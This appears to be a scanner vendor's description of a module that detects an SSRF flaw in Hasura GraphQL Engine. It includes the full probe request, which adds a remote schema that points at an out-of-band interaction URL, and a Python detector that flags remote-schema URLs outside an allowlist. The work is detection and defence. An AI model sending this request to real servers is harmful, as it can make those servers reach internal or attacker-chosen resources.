Automate Recon and scanning process with Vidoc. All security teams in one place
By kannthu
This module, named "Hasura GraphQL Engine - SSRF Side Request Forgery", is a test case designed to detect a Server-Side Request Forgery vulnerability in the Hasura GraphQL Engine software. The vulnerability is rated high severity, reflecting its potential impact on the security of the system.
This vulnerability, if exploited, can lead to Server-Side Request Forgery (SSRF) attacks. SSRF allows an attacker to make requests to internal or external resources on behalf of the vulnerable server, potentially leading to unauthorized access, data leakage, or further exploitation of the system.
The module works by sending a specific HTTP request to the target system and analyzing the response. It checks for two matching conditions:
If both conditions are met, the module identifies the presence of the vulnerability.
Here is an example of the HTTP request used by the module:
POST /v1/query HTTP/1.1
Host: <Hostname>
Content-Type: application/json
Accept: */*

{
  "type": "bulk",
  "args": [
    {
      "type": "add_remote_schema",
      "args": {
        "name": "test",
        "definition": {
          "url": "https://<InteractionURL>",
          "headers": [],
          "timeout_seconds": 60,
          "forward_client_headers": true
        }
      }
    }
  ]
}
The module sends this request to the target system, replacing the placeholder "<Hostname>" with the target host and "<InteractionURL>" with an out-of-band interaction URL controlled by the scanner. It then analyzes the response to determine whether the vulnerability is present.
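The following Python script is an added example and is not part of Vidoc or of the module described above. It parses a /v1/query request body of the shape shown, flattens any "bulk" wrapper, and returns the URL that an add_remote_schema query would make the server fetch, flagging any host outside an allowlist. This is the kind of check a defender could run in a WAF rule or over captured request bodies to spot remote-schema additions pointing at arbitrary hosts; the allowlist entry and the sample interaction hostname are constructed assumptions.

```python
import json
from urllib.parse import urlsplit

# Hosts that a remote schema is legitimately allowed to point at; anything
# else is flagged. This value is a constructed assumption for the example.
ALLOWED_REMOTE_HOSTS = {"graphql.internal.example"}


def _iter_queries(body):
    """Yield every (type, args) pair in a query, flattening 'bulk' wrappers recursively."""
    if not isinstance(body, dict):
        return
    qtype = body.get("type")
    args = body.get("args")
    if qtype == "bulk" and isinstance(args, list):
        for sub in args:
            yield from _iter_queries(sub)
    elif qtype is not None:
        yield qtype, args


def find_remote_schema_urls(raw_body):
    """Return every URL an add_remote_schema query in raw_body would make Hasura fetch."""
    try:
        body = json.loads(raw_body)
    except (TypeError, ValueError):
        return []  # not JSON: nothing to inspect
    urls = []
    for qtype, args in _iter_queries(body):
        if qtype != "add_remote_schema" or not isinstance(args, dict):
            continue
        definition = args.get("definition")
        if isinstance(definition, dict) and isinstance(definition.get("url"), str):
            urls.append(definition["url"])
    return urls


def suspicious_remote_schema_urls(raw_body, allowed_hosts=ALLOWED_REMOTE_HOSTS):
    """Return the remote-schema URLs whose host is not on the allowlist."""
    flagged = []
    for url in find_remote_schema_urls(raw_body):
        host = urlsplit(url).hostname
        if host is None or host.lower() not in allowed_hosts:
            flagged.append(url)
    return flagged


# Constructed sample bodies: the first mirrors the request from the module
# description with the placeholder replaced by a made-up interaction host.
SAMPLE_BULK_BODY = json.dumps({
    "type": "bulk",
    "args": [{
        "type": "add_remote_schema",
        "args": {
            "name": "test",
            "definition": {
                "url": "https://oob.interaction.invalid",
                "headers": [],
                "timeout_seconds": 60,
                "forward_client_headers": True,
            },
        },
    }],
})

SAMPLE_BENIGN_BODY = json.dumps({
    "type": "add_remote_schema",
    "args": {
        "name": "internal",
        "definition": {"url": "https://graphql.internal.example/v1/graphql"},
    },
})

if __name__ == "__main__":
    for label, body in (("bulk", SAMPLE_BULK_BODY), ("benign", SAMPLE_BENIGN_BODY)):
        print(label, "flagged:", suspicious_remote_schema_urls(body))
```

The walker is written to recurse through nested "bulk" queries rather than looking only one level down, so a remote-schema addition wrapped several layers deep is still surfaced; non-JSON input and malformed argument shapes return an empty result instead of raising.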
If the vulnerability is detected, it is recommended to take immediate action to address the SSRF vulnerability in the Hasura GraphQL Engine software. This may involve applying patches or updates provided by the software vendor, implementing secure configuration settings, or following other recommended security practices.